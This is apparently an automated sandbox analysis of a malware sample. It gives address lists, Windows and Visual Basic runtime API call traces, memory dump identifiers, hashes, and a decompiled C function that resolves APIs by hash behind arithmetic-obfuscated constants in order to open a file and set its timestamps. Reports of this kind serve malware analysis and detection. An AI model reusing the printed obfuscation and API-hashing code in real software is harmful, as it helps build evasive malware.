                                                                                0x007a50f9
                                                                                0x007a50ff
                                                                                0x007a5153
                                                                                0x007a5158
                                                                                0x007a515a
                                                                                0x007a516d
                                                                                0x007a5172
                                                                                0x007a5172
                                                                                0x007a5179
                                                                                0x007a517b
                                                                                0x007a5180
                                                                                0x007a5182
                                                                                0x007a5195
                                                                                0x007a519a
                                                                                0x007a519a
                                                                                0x007a51a3
                                                                                0x007a51a5
                                                                                0x00000000
                                                                                0x007a5101
                                                                                0x007a5101
                                                                                0x007a5107
                                                                                0x00000000
                                                                                0x007a510d
                                                                                0x007a5112
                                                                                0x007a5114
                                                                                0x007a512c
                                                                                0x007a512c
                                                                                0x007a5139
                                                                                0x007a513b
                                                                                0x007a513d
                                                                                0x007a514b
                                                                                0x007a505c
                                                                                0x007a505c
                                                                                0x00000000
                                                                                0x007a505c
                                                                                0x007a505c
                                                                                0x007a5107
                                                                                0x007a507a
                                                                                0x007a507a
                                                                                0x007a50c2
                                                                                0x007a50c7
                                                                                0x007a50c9
                                                                                0x007a50dc
                                                                                0x007a50e1
                                                                                0x007a50e1
                                                                                0x007a50ed
                                                                                0x00000000
                                                                                0x007a507c
                                                                                0x007a5082
                                                                                0x007a50ad
                                                                                0x007a50b0
                                                                                0x007a50b2
                                                                                0x007a50ba
                                                                                0x00000000
                                                                                0x007a5084
                                                                                0x007a508a
                                                                                0x00000000
                                                                                0x007a5090
                                                                                0x007a509a
                                                                                0x007a50a8
                                                                                0x007a505c
                                                                                0x007a505c
                                                                                0x00000000
                                                                                0x007a505c
                                                                                0x007a505c
                                                                                0x007a508a
                                                                                0x007a5082
                                                                                0x007a507a
                                                                                0x00000000
                                                                                0x007a5078

                                                                                APIs
                                                                                • OpenServiceW.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,007A8AC8,?,3251FEFE,?,?), ref: 007A5139
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,007A8AC8,?,3251FEFE,?,?), ref: 007A5355
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeapOpenService
                                                                                • String ID:
                                                                                • API String ID: 4051131143-0
                                                                                • Opcode ID: 7814676fb1a8e0c76a32ff4c3ba92a54483379176e2ee60698957da1839b36f3
                                                                                • Instruction ID: 898748be5ed3681b0eacf37f27814bc3e3fbd86f59befed6e78b162c9722819d
                                                                                • Opcode Fuzzy Hash: 7814676fb1a8e0c76a32ff4c3ba92a54483379176e2ee60698957da1839b36f3
                                                                                • Instruction Fuzzy Hash: 0D810632B047159BDB24AF7CCC9572B76EAABD7744F014729F812EB291EA2C8D0047C6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 007A80A0, Relevance: 1.7, APIs: 1, Instructions: 219fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 66%
                                                                                			E007A80A0(signed int __edx) {
				short _v524;
				struct _SECURITY_ATTRIBUTES* _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				intOrPtr _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				void* __ebx;
				void* __ebp;
				void* _t58;
				void* _t64;
				void* _t66;
				intOrPtr* _t68;
				void* _t72;
				intOrPtr* _t77;
				intOrPtr* _t79;
				void* _t81;
				void* _t82;
				intOrPtr* _t85;
				void* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t91;
				void* _t95;
				intOrPtr _t100;
				char _t104;
				signed int _t121;
				void* _t124;
				void* _t126;
				void* _t127;
				signed int* _t128;
				void* _t130;

				_t121 = __edx;
				_t128 =  &_v596;
				_v584 = 0x9318;
				_t58 = 0x343bfd89;
				_v584 = _v584 ^ 0xde90c338;
				_v584 = _v584 ^ 0xde905120;
				_v596 = 0x7d19;
				_v596 = _v596 << 9;
				_v596 = _v596 >> 0xe;
				_v596 = _v596 + 0xffff07e5;
				_v596 = _v596 | 0x8aea6eef;
				_v596 = _v596 + 0xd867;
				_v596 = _v596 + 0x9c41;
				_v596 = _v596 + 0x3de0;
				_v596 = _v596 + 0x218b;
				_v596 = _v596 ^ 0x00014403;
				_v592 = 0x2591;
				_t127 = _v584;
				_t95 = 0;
				_v592 = _v592 * 0x7d;
				_v592 = _v592 + 0x8d68;
				_v592 = _v592 + 0xffff8911;
				_v592 = _v592 * 0x6a;
				_v592 = _v592 + 0xffff93d5;
				_v592 = _v592 ^ 0x07a13cd2;
				_v588 = 0x789;
				_v588 = _v588 >> 1;
				_v588 = _v588 ^ 0xaee58af2;
				_v588 = _v588 ^ 0xaee58936;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t130 = _t58 - 0xea5411f;
							if(_t130 > 0) {
								break;
							}
							if(_t130 == 0) {
								_t72 = E007A34C0(0x7ad970);
								_t121 =  *0x7ae158;
								_t126 = _t72;
								if(_t121 == 0) {
									_t121 = E007A3E60(_t95, E007A3F00(0xc6fbcd74), 0xba71dd03, _t127);
									 *0x7ae158 = _t121;
								}
								_t100 =  *0x7ae54c; // 0x8df0b0
								_t50 = _t100 + 0x260; // 0x8df310
								_t51 = _t100 + 0x18; // 0x8df0c8
								 *_t121( &_v524, 0x104, _t126, _t51, _t50);
								_t77 =  *0x7ae494;
								_t128 =  &(_t128[5]);
								if(_t77 == 0) {
									_t82 = E007A3F00(0x9bab0b12);
									_t121 = 0x7facde30;
									_t77 = E007A3E60(_t95, _t82, 0x7facde30, _t127);
									 *0x7ae494 = _t77;
								}
								_t124 =  *_t77();
								_t79 =  *0x7adf30;
								if(_t79 == 0) {
									_t81 = E007A3F00(0x9bab0b12);
									_t121 = 0x5010a54d;
									_t79 = E007A3E60(_t95, _t81, 0x5010a54d, _t127);
									 *0x7adf30 = _t79;
								}
								 *_t79(_t124, 0, _t126);
								_t58 = 0x2c2d24c8;
								goto L1;
							} else {
								if(_t58 == 0x2f64d8b) {
									_t85 =  *0x7ae1d4;
									if(_t85 == 0) {
										_t87 = E007A3F00(0x9bab0b12);
										_t121 = 0xa229df38;
										_t85 = E007A3E60(_t95, _t87, 0xa229df38, _t127);
										 *0x7ae1d4 = _t85;
									}
									 *_t85( &_v572);
									_t58 = 0xc5e088d;
									continue;
								} else {
									if(_t58 == 0x6f65414) {
										_t88 = _v568;
										_t104 = _v572;
										_v560 = _t88;
										_v552 = _t88;
										_v544 = _t88;
										_v536 = _t88;
										_t89 =  *0x7adee4;
										_v564 = _t104;
										_v556 = _t104;
										_v548 = _t104;
										_v540 = _t104;
										_v532 = 0;
										if(_t89 == 0) {
											_t91 = E007A3F00(0x9bab0b12);
											_t121 = 0x4bf45878;
											_t89 = E007A3E60(_t95, _t91, 0x4bf45878, _t127);
											 *0x7adee4 = _t89;
										}
										 *_t89(_t127, 0,  &_v564, 0x28);
										_t58 = 0x3557bd8c;
										_t95 =  !=  ? 1 : _t95;
										continue;
									} else {
										if(_t58 != 0xc5e088d) {
											goto L24;
										} else {
											_v580 = 0xa8c00;
											_v576 = 0;
											_v596 = E007AB6E0(_v580, _v576, 0x989680, 0);
											_v592 = _t121;
											_v588 = _v588 - _v596;
											_t58 = 0xea5411f;
											asm("sbb [esp+0x2c], ecx");
											continue;
										}
									}
								}
							}
							L35:
						}
						if(_t58 == 0x2c2d24c8) {
							if( *0x7ade04 == 0) {
								_t66 = E007A3F00(0x9bab0b12);
								_t121 = 0xb66d748a;
								 *0x7ade04 = E007A3E60(_t95, _t66, 0xb66d748a, _t127);
							}
							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
							_t127 = _t64;
							if(_t127 == 0xffffffff) {
								goto L34;
							} else {
								_t58 = 0x6f65414;
								goto L2;
							}
						} else {
							if(_t58 == 0x343bfd89) {
								_t58 = 0x2f64d8b;
								goto L2;
							} else {
								if(_t58 == 0x3557bd8c) {
									_t68 =  *0x7ade3c;
									if(_t68 == 0) {
										_t68 = E007A3E60(_t95, E007A3F00(0x9bab0b12), 0x20de7595, _t127);
										 *0x7ade3c = _t68;
									}
									 *_t68(_t127);
									L34:
									return _t95;
								} else {
									goto L24;
								}
							}
						}
						goto L35;
						L24:
					} while (_t58 != 0xcfe8e);
					return _t95;
					goto L35;
				}
			}














































                                                                                0x007a80a0
                                                                                0x007a80a0
                                                                                0x007a80a6
                                                                                0x007a80ae
                                                                                0x007a80b3
                                                                                0x007a80bb
                                                                                0x007a80c3
                                                                                0x007a80ca
                                                                                0x007a80ce
                                                                                0x007a80d2
                                                                                0x007a80d9
                                                                                0x007a80e0
                                                                                0x007a80e7
                                                                                0x007a80ee
                                                                                0x007a80f5
                                                                                0x007a80fc
                                                                                0x007a8103
                                                                                0x007a8112
                                                                                0x007a8116
                                                                                0x007a8119
                                                                                0x007a811d
                                                                                0x007a8125
                                                                                0x007a8133
                                                                                0x007a8137
                                                                                0x007a813f
                                                                                0x007a8147
                                                                                0x007a814f
                                                                                0x007a8153
                                                                                0x007a815b
                                                                                0x007a8163
                                                                                0x007a8163
                                                                                0x007a8168
                                                                                0x007a8170
                                                                                0x007a8170
                                                                                0x007a8170
                                                                                0x007a8170
                                                                                0x007a8175
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a817b
                                                                                0x007a828c
                                                                                0x007a8291
                                                                                0x007a8297
                                                                                0x007a829b
                                                                                0x007a82b3
                                                                                0x007a82b5
                                                                                0x007a82b5
                                                                                0x007a82bb
                                                                                0x007a82c1
                                                                                0x007a82c8
                                                                                0x007a82d7
                                                                                0x007a82d9
                                                                                0x007a82de
                                                                                0x007a82e3
                                                                                0x007a82ea
                                                                                0x007a82ef
                                                                                0x007a82f6
                                                                                0x007a82fb
                                                                                0x007a82fb
                                                                                0x007a8302
                                                                                0x007a8304
                                                                                0x007a830b
                                                                                0x007a8312
                                                                                0x007a8317
                                                                                0x007a831e
                                                                                0x007a8323
                                                                                0x007a8323
                                                                                0x007a832c
                                                                                0x007a832e
                                                                                0x00000000
                                                                                0x007a8181
                                                                                0x007a8186
                                                                                0x007a8252
                                                                                0x007a8259
                                                                                0x007a8260
                                                                                0x007a8265
                                                                                0x007a826c
                                                                                0x007a8271
                                                                                0x007a8271
                                                                                0x007a827b
                                                                                0x007a827d
                                                                                0x00000000
                                                                                0x007a818c
                                                                                0x007a8191
                                                                                0x007a81e3
                                                                                0x007a81e7
                                                                                0x007a81eb
                                                                                0x007a81ef
                                                                                0x007a81f3
                                                                                0x007a81f7
                                                                                0x007a81fb
                                                                                0x007a8200
                                                                                0x007a8204
                                                                                0x007a8208
                                                                                0x007a820c
                                                                                0x007a8210
                                                                                0x007a821a
                                                                                0x007a8221
                                                                                0x007a8226
                                                                                0x007a822d
                                                                                0x007a8232
                                                                                0x007a8232
                                                                                0x007a8241
                                                                                0x007a8245
                                                                                0x007a824a
                                                                                0x00000000
                                                                                0x007a8193
                                                                                0x007a8198
                                                                                0x00000000
                                                                                0x007a819e
                                                                                0x007a81a0
                                                                                0x007a81a8
                                                                                0x007a81c4
                                                                                0x007a81c8
                                                                                0x007a81d4
                                                                                0x007a81d8
                                                                                0x007a81dd
                                                                                0x00000000
                                                                                0x007a81dd
                                                                                0x007a8198
                                                                                0x007a8191
                                                                                0x007a8186
                                                                                0x00000000
                                                                                0x007a817b
                                                                                0x007a833d
                                                                                0x007a8377
                                                                                0x007a837e
                                                                                0x007a8383
                                                                                0x007a8391
                                                                                0x007a8391
                                                                                0x007a83b4
                                                                                0x007a83b6
                                                                                0x007a83bb
                                                                                0x00000000
                                                                                0x007a83bd
                                                                                0x007a83bd
                                                                                0x00000000
                                                                                0x007a83bd
                                                                                0x007a833f
                                                                                0x007a8344
                                                                                0x007a8365
                                                                                0x00000000
                                                                                0x007a8346
                                                                                0x007a834b
                                                                                0x007a83c7
                                                                                0x007a83ce
                                                                                0x007a83e1
                                                                                0x007a83e6
                                                                                0x007a83e6
                                                                                0x007a83ec
                                                                                0x007a83f1
                                                                                0x007a83fa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x007a834b
                                                                                0x007a8344
                                                                                0x00000000
                                                                                0x007a834d
                                                                                0x007a834d
                                                                                0x007a8364
                                                                                0x00000000
                                                                                0x007a8364

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 007A83B4
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2284406713.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true
                                                                                • Associated: 00000008.00000002.2284403091.00000000007A0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284418757.00000000007AD000.00000004.00000001.sdmp Download File
                                                                                • Associated: 00000008.00000002.2284422950.00000000007AF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_7a0000_tmp_e473b4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 0000e154f4796464b877179a0f21ff3fdda3edec09958cb60048c8b053d33881
                                                                                • Instruction ID: 20e09068bdee8f5902988e1a65e9cfcc218dd0e117da5ba740f490200a9d4c9e
                                                                                • Opcode Fuzzy Hash: 0000e154f4796464b877179a0f21ff3fdda3edec09958cb60048c8b053d33881
                                                                                • Instruction Fuzzy Hash: 6A817C70A083048FD758DF68C84462FB6E5ABDA744F104A2EF586CB290EB78DD058B57
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004197A0, Relevance: 341.2, APIs: 167, Strings: 27, Instructions: 1699COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041981D
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041987E
                                                                                • __vbaI4Var.MSVBVM60(?), ref: 00419890
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,00000054), ref: 004198B2
                                                                                • __vbaFreeObj.MSVBVM60 ref: 004198BB
                                                                                • __vbaFreeVar.MSVBVM60 ref: 004198C4
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 004198D8
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419924
                                                                                • __vbaI4Var.MSVBVM60(?), ref: 00419936
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,0000006C), ref: 00419962
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041996B
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419974
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00419988
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 004199D4
                                                                                • __vbaI4Var.MSVBVM60(?), ref: 004199E6
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,00000054), ref: 00419A12
                                                                                • __vbaFreeObj.MSVBVM60 ref: 00419A1B
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419A24
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419A66
                                                                                • __vbaBoolVar.MSVBVM60(?), ref: 00419A75
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00080005,0040F430,00000094), ref: 00419AA1
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419AAE
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,00401610,0040F430,000002B0), ref: 00419AE9
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410678,00000024), ref: 00419B13
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00419B23
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,72A1A274,00410748,0000001C), ref: 00419B7D
                                                                                • __vbaCastObjVar.MSVBVM60(?,00410280), ref: 00419B94
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00419B9F
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,00000214), ref: 00419BC7
                                                                                • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00419BDB
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00419BEB
                                                                                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00419C02
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419C4E
                                                                                • __vbaStrVarVal.MSVBVM60(?,?), ref: 00419C64
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,0000023C), ref: 00419C8C
                                                                                • __vbaFreeStr.MSVBVM60 ref: 00419C95
                                                                                • __vbaFreeObj.MSVBVM60 ref: 00419C9E
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419CA7
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419D08
                                                                                • __vbaI2Var.MSVBVM60(?), ref: 00419D12
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419D1F
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419D6F
                                                                                • __vbaI2Var.MSVBVM60(?), ref: 00419D79
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419D86
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419DD8
                                                                                • __vbaI2Var.MSVBVM60(?), ref: 00419DE2
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419DEF
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419E41
                                                                                • __vbaI2Var.MSVBVM60(?), ref: 00419E4B
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419E58
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419EAA
                                                                                • __vbaI2Var.MSVBVM60(?), ref: 00419EB4
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419EC1
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419F13
                                                                                • __vbaBoolVar.MSVBVM60(?), ref: 00419F1D
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419F2A
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419F7C
                                                                                • __vbaBoolVar.MSVBVM60(?), ref: 00419F86
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419F93
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419FE5
                                                                                • __vbaI2Var.MSVBVM60(?), ref: 00419FEF
                                                                                • __vbaFreeVar.MSVBVM60 ref: 00419FFC
                                                                                • __vbaI4Str.MSVBVM60(&H40), ref: 0041A007
                                                                                • __vbaI4Str.MSVBVM60(&H1000,00000000), ref: 0041A013
                                                                                • __vbaSetSystemError.MSVBVM60(00000000,00001190,00000000), ref: 0041A02D
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A08B
                                                                                • __vbaBoolVar.MSVBVM60(?), ref: 0041A095
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041A0A2
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A0F4
                                                                                • __vbaI2Var.MSVBVM60(?), ref: 0041A0FE
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041A10B
                                                                                • __vbaSetSystemError.MSVBVM60(00620000,00000000,00001190,?), ref: 0041A142
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041A14B
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A1A0
                                                                                • __vbaStrVarMove.MSVBVM60(00000003), ref: 0041A1AA
                                                                                • __vbaStrMove.MSVBVM60 ref: 0041A1B5
                                                                                • __vbaStrCopy.MSVBVM60 ref: 0041A1C0
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0041A1C9
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041A1D2
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A227
                                                                                • __vbaStrVarMove.MSVBVM60(00000003), ref: 0041A231
                                                                                • __vbaStrMove.MSVBVM60 ref: 0041A23C
                                                                                • __vbaStrCopy.MSVBVM60 ref: 0041A247
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0041A250
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041A259
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A2AE
                                                                                • __vbaStrVarMove.MSVBVM60(00000003), ref: 0041A2B8
                                                                                • __vbaStrMove.MSVBVM60 ref: 0041A2C3
                                                                                • __vbaStrCopy.MSVBVM60 ref: 0041A2CE
                                                                                • __vbaFreeStr.MSVBVM60 ref: 0041A2D7
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041A2E0
                                                                                • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 0041A2F9
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004104C8,00000038,?,?,?,?,?,?,?,00000003), ref: 0041A36D
                                                                                • __vbaNew2.MSVBVM60(004104D8,0042AA34,?,?,?,?,?,?,?,00000003), ref: 0041A386
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004104C8,00000038,?,?,?,?,?,?,?,?), ref: 0041A414
                                                                                • __vbaVar2Vec.MSVBVM60(?,00000003,?,?,?,?,?,?,?,?), ref: 0041A422
                                                                                • __vbaRefVarAry.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0041A42C
                                                                                • __vbaUbound.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?), ref: 0041A437
                                                                                • __vbaErase.MSVBVM60(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0041A455
                                                                                • __vbaAryMove.MSVBVM60(0042A030,00000004,?,?,?,?,?,?,?,?), ref: 0041A473
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,?,00000003,?,?,?,?,?,?,?,?), ref: 0041A483
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A4E0
                                                                                • __vbaStrVarMove.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A4EA
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A4F5
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A500
                                                                                • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A509
                                                                                • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A512
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A565
                                                                                • __vbaBoolVar.MSVBVM60(00000003), ref: 0041A56F
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041A57C
                                                                                  • Part of subcall function 0041D540: __vbaAryConstruct2.MSVBVM60(?,00411224,00000011,?,00401610,?), ref: 0041D57F
                                                                                  • Part of subcall function 0041D540: __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5A0
                                                                                  • Part of subcall function 0041D540: __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5E7
                                                                                  • Part of subcall function 0041D540: __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5EF
                                                                                  • Part of subcall function 0041D540: __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5FF
                                                                                  • Part of subcall function 0041D540: __vbaUbound.MSVBVM60(00000001), ref: 0041D62C
                                                                                  • Part of subcall function 0041D540: __vbaGenerateBoundsError.MSVBVM60 ref: 0041D667
                                                                                  • Part of subcall function 0041BC40: __vbaUbound.MSVBVM60(00000001,00000000,?,00401610,?), ref: 0041BCAE
                                                                                  • Part of subcall function 0041BC40: __vbaGenerateBoundsError.MSVBVM60 ref: 0041BCF9
                                                                                  • Part of subcall function 0041BC40: #632.MSVBVM60(?,00004008,00000000,00000002), ref: 0041BD46
                                                                                  • Part of subcall function 0041BC40: __vbaStrVarVal.MSVBVM60(?,?), ref: 0041BD54
                                                                                  • Part of subcall function 0041BC40: #516.MSVBVM60(00000000), ref: 0041BD5B
                                                                                  • Part of subcall function 0041BC40: __vbaUI1I2.MSVBVM60 ref: 0041BD63
                                                                                  • Part of subcall function 0041BC40: __vbaFreeStr.MSVBVM60 ref: 0041BD6F
                                                                                  • Part of subcall function 0041BC40: __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041BD7F
                                                                                  • Part of subcall function 0041BC40: __vbaGenerateBoundsError.MSVBVM60 ref: 0041BD05
                                                                                  • Part of subcall function 0041BC40: __vbaGenerateBoundsError.MSVBVM60 ref: 0041BD9F
                                                                                  • Part of subcall function 0041BC40: #608.MSVBVM60(00000002,?), ref: 0041BDE0
                                                                                  • Part of subcall function 0041BC40: __vbaInStrVar.MSVBVM60(?,00000000,00000002,00000008,00000001), ref: 0041BDF8
                                                                                  • Part of subcall function 0041BC40: __vbaI2Var.MSVBVM60(00000000), ref: 0041BDFF
                                                                                  • Part of subcall function 0041BC40: __vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0041BE11
                                                                                  • Part of subcall function 0041BC40: #632.MSVBVM60(?,00000008,?,00000002), ref: 0041BE62
                                                                                  • Part of subcall function 0041BC40: __vbaStrVarMove.MSVBVM60(?,?,00000002), ref: 0041BE6C
                                                                                  • Part of subcall function 0041BC40: __vbaStrMove.MSVBVM60(?,00000002), ref: 0041BE77
                                                                                  • Part of subcall function 0041BC40: __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,00000002), ref: 0041BE87
                                                                                  • Part of subcall function 0041BC40: #617.MSVBVM60(00000002,00004008,00000000), ref: 0041BEBC
                                                                                  • Part of subcall function 0041BC40: #608.MSVBVM60(?,?), ref: 0041BEC7
                                                                                  • Part of subcall function 0041BC40: __vbaGenerateBoundsError.MSVBVM60 ref: 0041BDAB
                                                                                  • Part of subcall function 0041BC40: #632.MSVBVM60(?,?,00000000,?), ref: 0041BF22
                                                                                  • Part of subcall function 0041BC40: __vbaVarCat.MSVBVM60(?,?,00000002), ref: 0041BF3A
                                                                                  • Part of subcall function 0041BC40: __vbaVarCat.MSVBVM60(?,00000008,00000000), ref: 0041BF48
                                                                                  • Part of subcall function 0041BC40: __vbaVarCat.MSVBVM60(?,?,00000000), ref: 0041BF59
                                                                                  • Part of subcall function 0041BC40: __vbaStrVarMove.MSVBVM60(00000000), ref: 0041BF5C
                                                                                  • Part of subcall function 0041BC40: __vbaStrMove.MSVBVM60 ref: 0041BF69
                                                                                  • Part of subcall function 0041BC40: __vbaFreeVarList.MSVBVM60(00000007,00000002,?,?,0000000A,?,?,?), ref: 0041BF93
                                                                                  • Part of subcall function 0041BC40: __vbaFreeStr.MSVBVM60(0041BFFB), ref: 0041BFF4
                                                                                  • Part of subcall function 004229F0: __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000019,72A0C33A), ref: 00422AB1
                                                                                  • Part of subcall function 004229F0: __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00422B12
                                                                                  • Part of subcall function 004229F0: __vbaVarTstEq.MSVBVM60(?,?,00001BBC), ref: 00422B78
                                                                                  • Part of subcall function 004229F0: __vbaI2Var.MSVBVM60(?), ref: 00422B87
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C,?,?,0042A030,0042A030), ref: 0041A601
                                                                                • __vbaBoolVar.MSVBVM60(00000003,?,?,0042A030,0042A030), ref: 0041A60B
                                                                                • __vbaFreeVar.MSVBVM60(?,?,0042A030,0042A030), ref: 0041A618
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C,?,?,?,?,?,?,?,0042A030), ref: 0041A66A
                                                                                • __vbaBoolVar.MSVBVM60(00000003,?,?,?,?,?,?,?,0042A030), ref: 0041A674
                                                                                • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,0042A030), ref: 0041A681
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,00000003,?,00422E90,00000000,?,00000003,?,?,?,?,?,?,?,0042A030), ref: 0041A6DF
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A728
                                                                                • __vbaStrVarMove.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A732
                                                                                • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A73D
                                                                                • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042A030), ref: 0041A748
